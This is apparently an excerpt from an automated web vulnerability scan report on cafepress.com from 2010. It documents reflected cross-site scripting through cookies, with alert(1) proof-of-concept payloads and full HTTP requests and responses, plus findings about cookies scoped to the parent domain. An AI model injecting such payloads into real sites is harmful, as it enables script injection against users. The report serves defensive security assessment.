__utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAb9ba9"-alert(1)-"3e702ef6992 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 174586 Date: Sun, 26 Dec 2010 13:49:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 174586 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb9ba9"-alert(1)-"3e702ef6992 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.133. http://www.cafepress.com/sk/TheGamingApe [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /sk/TheGamingApe
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 622eb</script><script>alert(1)</script>7a1f01045b0 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sk/TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=622eb</script><script>alert(1)</script>7a1f01045b0 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 174630 Date: Sun, 26 Dec 2010 13:49:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 174630 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... _us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SKGallery' window.cafepress.tealeaf.searchTerm = '622eb</script><script>alert(1)</script>7a1f01045b0 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_0...[SNIP]...
2. Cookie scoped to parent domain
There are 70 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie header, the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
2.1. http://www.cafepress.com/
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; 
cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 75158 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75158 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
2.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; 
__utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 301 Moved Permanently Location: http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 Content-Length: 0 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private
2.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144?cmp=pfc--ca--us--152--273694144&utm_term=273694144&utm_campaign=Dark+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; cppid=5185601; xid=0; jid=0; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; cp-v=D0026F27AADDAF9A26C54608326FC1BA; utm_medium=productfeed; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; __utmb_sweepery=1.2.10.1293371031; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%2C%22referrer%22%3A%22None%22%2C%22viewCount%22%3A1%7D; cp_st=; cp_sc=100178; cppss=3x0; 
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmb-UA-11730150-1=1.2.10.1293371031; __utmc-UA-11730150-1=1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmb-UA-12011589-1=1.2.10.1293371032; __utmc-UA-12011589-1=1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmc=265344797; __utmb=265344797.12.10.1293371029; __cmbDomTm=0; __cmbTpvTm=1392
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 Cteonnt-Length: 118606 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 13:56:00 GMT Connection: close Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 118606 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly
cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 95181
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:44:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly
Set-Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
